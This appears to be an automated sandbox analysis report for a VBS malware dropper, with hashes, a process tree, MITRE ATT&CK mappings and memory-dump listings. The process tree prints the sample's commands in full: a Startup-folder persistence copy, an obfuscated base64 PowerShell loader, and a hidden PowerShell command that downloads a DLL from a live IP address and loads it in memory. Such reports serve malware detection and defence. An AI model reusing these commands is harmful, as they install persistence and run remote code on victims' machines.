9932a9c3c258842f413e5866e866cf504affb707fbb37fcf02506c54e40f1f21

General

Target

NJ en lo que regresa.vbs
Size

484KB
MD5

cfe8083b99457520d371e972f4d340a9
SHA1

e11e37e2b04513bc50632265e4b81b24209ddd04
SHA256

9932a9c3c258842f413e5866e866cf504affb707fbb37fcf02506c54e40f1f21
SHA512

021c64c5762b6a75ee9fcabbe33656c49a259f427e94f754e53c31b20a5f2033ec925b114558cdd7ed34477e471a0850eafd8c046dee2961e47a236c2bbd6a64

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://149.56.200.165/dll/3.txt

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 996 powershell.exe

flow	pid	process
4	996	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RHF.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RHF.vbs	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

436 PING.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

572 powershell.exe
956 powershell.exe
996 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 572 powershell.exe
Token: SeDebugPrivilege 956 powershell.exe
Token: SeDebugPrivilege 996 powershell.exe

pid	process
436	PING.EXE

pid	process
572	powershell.exe
956	powershell.exe
996	powershell.exe

description	pid	process
Token: SeDebugPrivilege	572	powershell.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	996	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

WScript.execmd.exepowershell.exe

description	pid	process	target process
PID 1672 wrote to memory of 1104	1672	WScript.exe	cmd.exe
PID 1672 wrote to memory of 1104	1672	WScript.exe	cmd.exe
PID 1672 wrote to memory of 1104	1672	WScript.exe	cmd.exe
PID 1104 wrote to memory of 436	1104	cmd.exe	PING.EXE
PID 1104 wrote to memory of 436	1104	cmd.exe	PING.EXE
PID 1104 wrote to memory of 436	1104	cmd.exe	PING.EXE
PID 1104 wrote to memory of 572	1104	cmd.exe	powershell.exe
PID 1104 wrote to memory of 572	1104	cmd.exe	powershell.exe
PID 1104 wrote to memory of 572	1104	cmd.exe	powershell.exe
PID 1672 wrote to memory of 956	1672	WScript.exe	powershell.exe
PID 1672 wrote to memory of 956	1672	WScript.exe	powershell.exe
PID 1672 wrote to memory of 956	1672	WScript.exe	powershell.exe
PID 956 wrote to memory of 996	956	powershell.exe	powershell.exe
PID 956 wrote to memory of 996	956	powershell.exe	powershell.exe
PID 956 wrote to memory of 996	956	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NJ en lo que regresa.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\NJ en lo que regresa.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RHF.vbs')
2⤵
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
3⤵
- Runs ping.exe
PID:436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\NJ en lo que regresa.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RHF.vbs')
3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC➠⇗↪Hk➠⇗↪d➠⇗↪Bl➠⇗↪Fs➠⇗↪XQBd➠⇗↪C➠⇗↪➠⇗↪J➠⇗↪BE➠⇗↪Ew➠⇗↪T➠⇗↪➠⇗↪g➠⇗↪D0➠⇗↪I➠⇗↪Bb➠⇗↪FM➠⇗↪eQBz➠⇗↪HQ➠⇗↪ZQBt➠⇗↪C4➠⇗↪QwBv➠⇗↪G4➠⇗↪dgBl➠⇗↪HI➠⇗↪d➠⇗↪Bd➠⇗↪Do➠⇗↪OgBG➠⇗↪HI➠⇗↪bwBt➠⇗↪EI➠⇗↪YQBz➠⇗↪GU➠⇗↪Ng➠⇗↪0➠⇗↪FM➠⇗↪d➠⇗↪By➠⇗↪Gk➠⇗↪bgBn➠⇗↪Cg➠⇗↪K➠⇗↪BO➠⇗↪GU➠⇗↪dw➠⇗↪t➠⇗↪E8➠⇗↪YgBq➠⇗↪GU➠⇗↪YwB0➠⇗↪C➠⇗↪➠⇗↪TgBl➠⇗↪HQ➠⇗↪LgBX➠⇗↪GU➠⇗↪YgBD➠⇗↪Gw➠⇗↪aQBl➠⇗↪G4➠⇗↪d➠⇗↪➠⇗↪p➠⇗↪C4➠⇗↪R➠⇗↪Bv➠⇗↪Hc➠⇗↪bgBs➠⇗↪G8➠⇗↪YQBk➠⇗↪FM➠⇗↪d➠⇗↪By➠⇗↪Gk➠⇗↪bgBn➠⇗↪Cg➠⇗↪JwBo➠⇗↪HQ➠⇗↪d➠⇗↪Bw➠⇗↪Do➠⇗↪Lw➠⇗↪v➠⇗↪DE➠⇗↪N➠⇗↪➠⇗↪5➠⇗↪C4➠⇗↪NQ➠⇗↪2➠⇗↪C4➠⇗↪Mg➠⇗↪w➠⇗↪D➠⇗↪➠⇗↪Lg➠⇗↪x➠⇗↪DY➠⇗↪NQ➠⇗↪v➠⇗↪GQ➠⇗↪b➠⇗↪Bs➠⇗↪C8➠⇗↪Mw➠⇗↪u➠⇗↪HQ➠⇗↪e➠⇗↪B0➠⇗↪Cc➠⇗↪KQ➠⇗↪p➠⇗↪Ds➠⇗↪WwBT➠⇗↪Hk➠⇗↪cwB0➠⇗↪GU➠⇗↪bQ➠⇗↪u➠⇗↪EE➠⇗↪c➠⇗↪Bw➠⇗↪EQ➠⇗↪bwBt➠⇗↪GE➠⇗↪aQBu➠⇗↪F0➠⇗↪Og➠⇗↪6➠⇗↪EM➠⇗↪dQBy➠⇗↪HI➠⇗↪ZQBu➠⇗↪HQ➠⇗↪R➠⇗↪Bv➠⇗↪G0➠⇗↪YQBp➠⇗↪G4➠⇗↪LgBM➠⇗↪G8➠⇗↪YQBk➠⇗↪Cg➠⇗↪J➠⇗↪BE➠⇗↪Ew➠⇗↪T➠⇗↪➠⇗↪p➠⇗↪C4➠⇗↪RwBl➠⇗↪HQ➠⇗↪V➠⇗↪B5➠⇗↪H➠⇗↪➠⇗↪ZQ➠⇗↪o➠⇗↪Cc➠⇗↪QwBs➠⇗↪GE➠⇗↪cwBz➠⇗↪Ew➠⇗↪aQBi➠⇗↪HI➠⇗↪YQBy➠⇗↪Hk➠⇗↪Mw➠⇗↪u➠⇗↪EM➠⇗↪b➠⇗↪Bh➠⇗↪HM➠⇗↪cw➠⇗↪x➠⇗↪Cc➠⇗↪KQ➠⇗↪u➠⇗↪Ec➠⇗↪ZQB0➠⇗↪E0➠⇗↪ZQB0➠⇗↪Gg➠⇗↪bwBk➠⇗↪Cg➠⇗↪JwBS➠⇗↪HU➠⇗↪bg➠⇗↪n➠⇗↪Ck➠⇗↪LgBJ➠⇗↪G4➠⇗↪dgBv➠⇗↪Gs➠⇗↪ZQ➠⇗↪o➠⇗↪CQ➠⇗↪bgB1➠⇗↪Gw➠⇗↪b➠⇗↪➠⇗↪s➠⇗↪C➠⇗↪➠⇗↪WwBv➠⇗↪GI➠⇗↪agBl➠⇗↪GM➠⇗↪d➠⇗↪Bb➠⇗↪F0➠⇗↪XQ➠⇗↪g➠⇗↪Cg➠⇗↪JwB0➠⇗↪Hg➠⇗↪d➠⇗↪➠⇗↪u➠⇗↪EE➠⇗↪UwBB➠⇗↪EM➠⇗↪M➠⇗↪➠⇗↪y➠⇗↪CU➠⇗↪V➠⇗↪BB➠⇗↪FI➠⇗↪SgBO➠⇗↪D➠⇗↪➠⇗↪Mg➠⇗↪l➠⇗↪DQ➠⇗↪Ng➠⇗↪w➠⇗↪DI➠⇗↪JQBl➠⇗↪HM➠⇗↪YQBi➠⇗↪C8➠⇗↪VwBF➠⇗↪E4➠⇗↪YQBz➠⇗↪GE➠⇗↪QwBj➠⇗↪HQ➠⇗↪YQBy➠⇗↪Eo➠⇗↪Tg➠⇗↪v➠⇗↪Gc➠⇗↪cgBv➠⇗↪C4➠⇗↪NQB1➠⇗↪GU➠⇗↪LgBh➠⇗↪HM➠⇗↪cwBh➠⇗↪GM➠⇗↪d➠⇗↪Bh➠⇗↪HI➠⇗↪agBu➠⇗↪C8➠⇗↪Lw➠⇗↪6➠⇗↪H➠⇗↪➠⇗↪d➠⇗↪B0➠⇗↪Gg➠⇗↪Jw➠⇗↪p➠⇗↪Ck➠⇗↪';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('➠⇗↪','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://149.56.200.165/dll/3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.ASAC02%TARJN02%4602%esab/WENasaCctarJN/gro.5ue.assactarjn//:ptth'))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:996

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
c24df19b22bcfbfe109ecb3c3507a4e0

SHA1
5248c8025ad7aa06aa2dd95fc82bb6a156b809d2

SHA256
4036c190c8dd070ec3928a6aa3f73026751b27d5caee51f78e2d41a079f3338c

SHA512
871dbb40ffb25727a417ad8f672764b597fbaf5f78404ef9137a0a9c8f2b5b44c784fefcbfd312853ba9d566c04c26a6b876814ef6e049a7ca38b6dc97b6ee45

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
c24df19b22bcfbfe109ecb3c3507a4e0

SHA1
5248c8025ad7aa06aa2dd95fc82bb6a156b809d2

SHA256
4036c190c8dd070ec3928a6aa3f73026751b27d5caee51f78e2d41a079f3338c

SHA512
871dbb40ffb25727a417ad8f672764b597fbaf5f78404ef9137a0a9c8f2b5b44c784fefcbfd312853ba9d566c04c26a6b876814ef6e049a7ca38b6dc97b6ee45

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/436-57-0x0000000000000000-mapping.dmp

Download
memory/572-58-0x0000000000000000-mapping.dmp

Download
memory/572-60-0x0000000002870000-0x0000000002872000-memory.dmp

Filesize
8KB

Download
memory/572-61-0x000007FEF3770000-0x000007FEF42CD000-memory.dmp

Filesize
11.4MB

Download
memory/572-64-0x0000000002874000-0x0000000002877000-memory.dmp

Filesize
12KB

Download
memory/572-65-0x000000000287B000-0x000000000289A000-memory.dmp

Filesize
124KB

Download
memory/572-62-0x0000000002872000-0x0000000002874000-memory.dmp

Filesize
8KB

Download
memory/956-69-0x0000000002650000-0x0000000002652000-memory.dmp

Filesize
8KB

Download
memory/956-63-0x0000000000000000-mapping.dmp

Download
memory/956-68-0x000007FEF2DD0000-0x000007FEF392D000-memory.dmp

Filesize
11.4MB

Download
memory/956-71-0x0000000002654000-0x0000000002657000-memory.dmp

Filesize
12KB

Download
memory/956-70-0x0000000002652000-0x0000000002654000-memory.dmp

Filesize
8KB

Download
memory/956-77-0x000000000265B000-0x000000000267A000-memory.dmp

Filesize
124KB

Download
memory/996-78-0x0000000002470000-0x0000000002472000-memory.dmp

Filesize
8KB

Download
memory/996-76-0x000007FEF2DD0000-0x000007FEF392D000-memory.dmp

Filesize
11.4MB

Download
memory/996-72-0x0000000000000000-mapping.dmp

Download
memory/996-79-0x0000000002472000-0x0000000002474000-memory.dmp

Filesize
8KB

Download
memory/996-80-0x0000000002474000-0x0000000002477000-memory.dmp

Filesize
12KB

Download
memory/996-81-0x000000000247B000-0x000000000249A000-memory.dmp

Filesize
124KB

Download
memory/1104-56-0x0000000000000000-mapping.dmp

Download
memory/1672-55-0x000007FEFC3A1000-0x000007FEFC3A3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing